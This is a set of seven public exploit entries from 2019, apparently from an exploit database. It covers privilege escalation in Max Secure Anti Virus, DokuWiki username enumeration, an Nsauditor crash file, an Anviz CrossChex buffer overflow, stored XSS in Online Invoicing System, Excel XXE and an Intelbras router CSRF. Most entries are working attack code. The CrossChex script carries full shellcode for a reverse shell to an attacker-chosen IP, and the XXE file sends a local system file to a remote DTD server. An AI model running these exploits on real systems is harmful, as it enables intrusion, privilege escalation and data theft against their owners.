# Exploit Title: Max Secure Anti Virus Plus 19.0.4.020 - Insecure File Permissions # Discovery by: hyp3rlinx # Date: 2019-12-02 # Vendor Homepage: www.maxpcsecure.com # Tested Version: 19.0.4.020 # CVE: N/A [+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MAX-SECURE-PLUS-ANTIVIRUS-INSECURE-PERMISSIONS.txt [+] ISR: ApparitionSec [Vendor] www.maxpcsecure.com [Affected Product Code Base] Max Secure Anti Virus Plus - 19.0.4.020 File hash: ab1dda23ad3955eb18fdb75f3cbc308a msplusx64.exe [Vulnerability Type] Insecure Permissions [CVE Reference] N/A [Security Issue] Max Secure Anti Virus Plus 19.0.4.020 has Insecure Permissions on the installation directory. Local attackers or malware running at low integrity can replace a .exe or .dll file to achieve privilege escalation. C:\Program Files\Max Secure Anti Virus Plus>cacls * | more C:\Program Files\Max Secure Anti Virus Plus\7z.dll NT AUTHORITY\Authenticated Users:(ID)F BUILTIN\Users:(ID)F NT AUTHORITY\SYSTEM:(ID)F BUILTIN\Administrators:(ID)F [Affected Component] Permissions on installation directory [Exploit/POC] #include <stdio.h> #include <windows.h> #define TARGET "C:\\Program Files\\Max Secure Anti Virus Plus\\MaxSDUI.exe" #define TMP "C:\\Program Files\\Max Secure Anti Virus Plus\\2.exe" #define DISABLED_TARGET "C:\\Program Files\\Max Secure Anti Virus Plus\\666.tmp" /* Max Secure Anti Virus Plus PoC By hyp3rlinx */ BOOL PWNED=FALSE; BOOL FileExists(LPCTSTR szPath){ DWORD dwAttrib = GetFileAttributes(szPath); return (dwAttrib != INVALID_FILE_ATTRIBUTES && !(dwAttrib & FILE_ATTRIBUTE_DIRECTORY)); } void main(void){ if(!FileExists(DISABLED_TARGET)){ CopyFile(TARGET, TMP, FALSE); Sleep(1000); CopyFile(TMP, DISABLED_TARGET, FALSE); printf("[+] Max Secure Anti Virus Plus EoP PoC\n"); Sleep(1000); printf("[+] Disabled MaxSDUI.exe ...\n"); Sleep(300); }else{ PWNED=TRUE; } if(!PWNED){ char fname[MAX_PATH]; char newLoc[]=TARGET; DWORD size = GetModuleFileNameA(NULL, fname, MAX_PATH); if (size){ printf("[+] Copying exploit to vuln dir...\n"); Sleep(1000); CopyFile(fname, TARGET, FALSE); printf("[+] Replaced legit Max Secure EXE...\n"); Sleep(2000); printf("[+] Done!\n"); MoveFile(fname, "C:\\Program Files\\Max Secure Anti Virus Plus\\MaxPwn.lnk"); Sleep(1000); exit(0); } }else{ if(FileExists(TMP)){ remove(TMP); } printf("[+] Max Secure Anti Virus Plus PWNED!!!\n"); printf("[+] hyp3rlinx\n"); system("pause"); } } [POC Video URL] https://www.youtube.com/watch?v=DXSV5geXkTw [Network Access] Local [Severity] High [Disclosure Timeline] Vendor Notification: November 19, 2019 Vendor: "received a reply they will fix soon" Status request: November 24, 2019 No replies other than automated response. November 29, 2019 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx

# Exploit Title: Dokuwiki 2018-04-22b - Username Enumeration # Date: 2019-12-01 # Exploit Author: Talha ŞEN # Vendor Homepage: https://www.dokuwiki.org/dokuwiki # Software Link: https://download.dokuwiki.org/ # Version: 2018-04-22b "Greebo" # Tested on: # Alpine Linux 3.5 (docker image) # PHP 5.6.30 # Apache/2.4.25 (Unix) # CVE : # At login page there is a "set new password" page as below: # Forgotten your password? Get a new one: Set new password # At this page there is username enumeration vulnerability. # Testing for non-valid user: POST /doku.php?id=start&do=resendpwd HTTP/1.1 sectok=&do=resendpwd&save=1&login=sss # Response for non-valid user(sss): <div class="error">Sorry, we can't find this user in our database.</div> ======================================================================== # Testing for valid user: POST /doku.php?id=start&do=resendpwd HTTP/1.1 sectok=&do=resendpwd&save=1&login=admin # Response for valid user (admin): <div class="error">There was an unexpected problem communicating with SMTP: Could not open SMTP Port.</div> <div class="error">Looks like there was an error on sending the password mail. Please contact the admin!</div>

# Exploit Title: Nsauditor 3.1.8.0 - 'Key' Denial of Service (PoC) # Discovery by: SajjadBnd # Date: 2019-11-30 # Vendor Homepage: http://www.nsauditor.com # Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe # Tested Version: 3.1.8.0 # Vulnerability Type: Denial of Service (DoS) Local # Tested on OS: Windows 10 - Pro # Email : [email protected] # About App # Nsauditor Network Security Auditor is a powerful network security tool designed to scan networks # and hosts for vulnerabilities, and to provide security alerts.Nsauditor network auditor checks enterprise # network for all potential methods that a hacker might use to attack it and create a report of potential # problems that were found , Nsauditor network auditing software significantly reduces the total cost of # network management in enterprise environments by enabling IT personnel and systems administrators gather # a wide range of information from all the computers in the network without installing server-side applications # on these computers and create a report of potential problems that were found. # POC # 1.Run the python script, it will create a new file "dos.txt" # 3.Run Nsauditor and click on "Register -> Enter Registration Code" # 2.Paste the content of dos.txt into the Field: 'Key' # 6.click 'ok' # 5.Crashed ;) #!/usr/bin/env python buffer = "\x41" * 1000 try: f=open("dos.txt","w") print "[+] Creating %s bytes DOS payload.." %len(buffer) f.write(buffer) f.close() print "[+] File created!" except: print "File cannot be created"

# Exploit Title: Anviz CrossChex 4.3.12 - Local Buffer Overflow # Date: 2019-11-30 # Exploit Author: Luis Catarino & Pedro Rodrigues # Vendor Homepage: https://www.anviz.com/ # Software Link: https://www.anviz.com/download.html # Version: Crosschex Standard x86 <= V4.3.12 # Tested on: 4.3.8.0, 4.3.12 # CVE : N/A # More info: https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html import socket import time import sys import binascii # Scapy for the broadcast packet with custom sport from scapy.all import Raw,IP,Dot1Q,UDP,Ether import scapy.all # shellcode working calc.exe calculator_payload = b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b" calculator_payload += b"\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7" calculator_payload += b"\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf" calculator_payload += b"\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c" calculator_payload += b"\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01" calculator_payload += b"\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31" calculator_payload += b"\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d" calculator_payload += b"\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66" calculator_payload += b"\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0" calculator_payload += b"\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f" calculator_payload += b"\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00" calculator_payload += b"\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5" calculator_payload += b"\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a" calculator_payload += b"\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53" calculator_payload += b"\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00" # shellcode windows x86 reverse_shell shell_payload_1 = b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b" shell_payload_1 += b"\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7" shell_payload_1 += b"\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf" shell_payload_1 += b"\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c" shell_payload_1 += b"\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01" shell_payload_1 += b"\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31" shell_payload_1 += b"\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d" shell_payload_1 += b"\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66" shell_payload_1 += b"\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0" shell_payload_1 += b"\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f" shell_payload_1 += b"\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68" shell_payload_1 += b"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8" shell_payload_1 += b"\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00" shell_payload_1 += b"\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f" shell_payload_1 += b"\xdf\xe0\xff\xd5\x97\x6a\x05\x68" # shellcode windows x86 reverse_shell (part_2) shell_payload_2 = b"\x68\x02\x00\x01\xbd\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5" shell_payload_2 += b"\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec" shell_payload_2 += b"\x68\xf0\xb5\xa2\x56\xff\xd5\x68\x63\x6d\x64\x00\x89" shell_payload_2 += b"\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66" shell_payload_2 += b"\xc7\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44" shell_payload_2 += b"\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68" shell_payload_2 += b"\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30" shell_payload_2 += b"\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68" shell_payload_2 += b"\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0" shell_payload_2 += b"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5" def ipToShellcode(ip): a = ip.split('.') b = hex(int(a[0])) + hex(int(a[1])) + hex(int(a[2])) + hex(int(a[3])) b = b.replace("0x","") return binascii.unhexlify(b) # sport has to be 5060 def sendFuzzingUDPBroadcast(ip="255.255.255.255", sport=5050, dport=5060): request = b"A"*77 # Original payload substitute request += b"B"*184 request += b"\x07\x18\x42\x00" # EIP - 00421807 crosscheck_standard.exe request += b"A"*4 # 269 bytes if len(sys.argv) > 2: request = request + shell_payload_1 + ipToShellcode(sys.argv[2]) + shell_payload_2 else: request = request + calculator_payload scapy.all.sendp( Ether(src='00:00:00:00:00:00', dst="ff:ff:ff:ff:ff:ff")/IP(src=ip,dst='255.255.255.255')/UDP(sport=sport,dport=dport)/Raw(load=request), iface=sys.argv[1] ) def setFuzzUDPServer(ip='', port=5050, timeout=150): try : s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) except: print('[!] Failed to create server socket') try: s.bind(('', port)) except: print('[*] Server socket bind failed') sys.exit() print('[*] Waiting for crosschex') s.settimeout(timeout) timeout = time.time() + timeout responses = [] while True: if time.time() > timeout: break try: response = s.recvfrom(1024) print(response) responses.append(response) sendFuzzingUDPBroadcast(ip=ip) response = s.recvfrom(1024) except socket.timeout: print("[!] Error with UDP server") s.close() return responses nargs = len(sys.argv) if nargs < 2: print("[*] Usage: python3 %s <network_interface> [<ip>]\n\tif you don't pass the ip of the LHOST it will drop a calculator, if you set the ip it will send a reverse shell to port 445") sys.exit(0) setFuzzUDPServer()

# Exploit Title: Online Invoicing System 2.6 - 'description' Persistent Cross-Site Scripting # Date: 2019-11-29 # Exploit Author: Cemal Cihad ÇİFTÇİ # Vendor Homepage: https://bigprof.com # Software Download Link : https://github.com/bigprof-software/online-invoicing-system # Software : Online Invoicing System # Version : 2.6 # Vulernability Type : Cross-site Scripting # Vulenrability : Stored XSS # Stored XSS has been discovered in the Online Invoicing System created by bigprof/AppGini # editmembers section. Description parameter affected from this vulnerability. # payload: <script>alert(123);</script> # HTTP POST request POST /inovicing/app/admin/pageEditGroup.php HTTP/1.1 Host: 10.10.10.160 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 464 Origin: http://10.10.10.160 Connection: close Referer: http://10.10.10.160/inovicing/app/admin/pageEditGroup.php?groupID=2 Cookie: inventory=4eg101l42apiuvutr7vguma5ar; online_inovicing_system=vl8ml5or8sgdee9ep9lnhglk69 Upgrade-Insecure-Requests: 1 groupID=2&name=Admins&description=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E&visitorSignup=0&invoices_insert=1&invoices_view=3&invoices_edit=3&invoices_delete=3&clients_insert=1&clients_view=3&clients_edit=3&clients_delete=3&item_prices_insert=1&item_prices_view=3&item_prices_edit=3&item_prices_delete=3&invoice_items_insert=1&invoice_items_view=3&invoice_items_edit=3&invoice_items_delete=3&items_insert=1&items_view=3&items_edit=3&items_delete=3&saveChanges=1

# Exploit Title: Microsoft Excel 2016 1901 - XML External Entity Injection # Discovery by: hyp3rlinx # Date: 2019-12-02 # Vendor Homepage: www.microsoft.com # Tested Version: 2016 v1901 # CVE: N/A [+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-EXCEL-2016-v1901-IMPORT-ERROR-EXTERNAL-ENTITY-INJECTION.txt [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] Excel 2016 v1901 Microsoft Excel is a spreadsheet developed by Microsoft for Windows, macOS, Android and iOS. It features calculation, graphing tools, pivot tables, and a macro programming language called Visual Basic for Applications. [CVE] N/A [Vulnerability Type] Error Import Based XML External Entity Injection [Security Issue] Excel query from file feature is vulnerable to "Error" based XML External Entity attacks, if the user chooses the "Import as Html page" functionality upon receiving errors importing a specially crafted XML file. This can result in potential remote data exfiltration, user interaction is required to exploit this vulnerability. Tested successfuly Windows 10 .NET framework version v4.0.30319. C:\>dir /b %windir%\Microsoft.NET\Framework\v* v4.0.30319 [Exploit/POC] Create a new ".xlsx" file then, go to Data tab and choose 'New Query/From File/From XML' 1) You will get error like: "Error: Unable to connect We encountered an error while trying to connect. The user will then get an option to 'Edit' where they can import the file as an HTML file Result Local data can be exfiltrated to remote server" 2) Excel will then give you option to 'Edit' and import as 'Html Page' from the drop down menu in Excel User has choose to import as HTML then XXE attack will succeed: e.g. 127.0.0.1 - - [05/Mar/2019 15:31:16] "GET /?;%20for%2016-bit%20app%20support[386Enh]woafont=dosapp.fonEGA80WOA.FON=EGA80WOA.FO /1.1" 200 - Malicious XML file to load as New Data Query "test.xml" <?xml version='1.0'?> <!DOCTYPE root [ <!ENTITY % file SYSTEM 'C:\Windows\system.ini'> <!ENTITY % dtd SYSTEM 'http://127.0.0.1:8000/payload.dtd'> %dtd;]> <pwn>&send;</pwn> [Network Access] Local [Severity] Medium [Disclosure Timeline] Vendor Notification: May 10, 2019 MSRC: May 17, 2019 "case did not meet the bar for servicing as a Security Release. Engineering Team may or may not fix in a future version of the release." November 30, 2019 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx

# Exploit Title: Intelbras Router RF1200 1.1.3 - Cross-Site Request Forgery # Date: 2019-11-06 # Exploit Author: Joas Antonio # Vendor Homepage: intelbras.com.br # Software Link: https://www.intelbras.com/pt-br/roteador-wireless-smart-dual-band-action-rf-1200 # Version: 1.1.3 (REQUIRED) # Tested on: Windows # CVE : CVE-2019-19516 #POC1: <html> <body> <form method="POST" action="http://IPROUTERRF1200/login/Auth"> <input type="hidden" name="username" value="admin"/> <input type="hidden" name="password" value="21232f297a57a5a743894a0e4a801fc3"/> <!-- password admin --> <input type="submit" value="Submit"> </form> </body> <html>